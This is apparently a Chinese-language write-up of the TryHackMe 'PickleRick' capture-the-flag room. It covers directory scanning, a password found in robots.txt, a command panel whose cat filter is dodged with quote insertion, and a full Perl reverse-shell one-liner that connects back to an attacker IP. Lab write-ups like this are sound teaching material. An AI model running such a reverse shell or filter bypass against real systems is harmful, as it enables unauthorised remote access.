PickleRick|TryHackMe

发表于 更新于 分类于

PickleRick|TryHackMe

瞟一眼source,有点信息。

dirsearch扫一下目录

1
2
3
4
5
python3 dirsearch.py -u http://10.10.249.222/

[08:33:49] 200 -    2KB - /assets/
[08:35:06] 200 -  882B  - /login.php
[08:35:55] 200 -   17B  - /robots.txt

先看robots.txt

应该是密码,Wubbalubbadubdub

/assets/,没啥东西

login.php,用刚刚的账号密码试试,进了

进来是个Command Panel,ls试下

cat命令用不了?

双引号绕过 c""at Sup3rS3cretPickl3Ingred.txt,拿到第一个

尝试反弹shell,bash不行,好像没有写权限,找了个反弹shell命令生成工具一个个试,没试几下机器崩了只能重启。。

Prel:

1
perl -e 'use Socket;$i="10.2.127.214";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'

找到第二个

sudo没有密码,直接看root目录,找到第三个。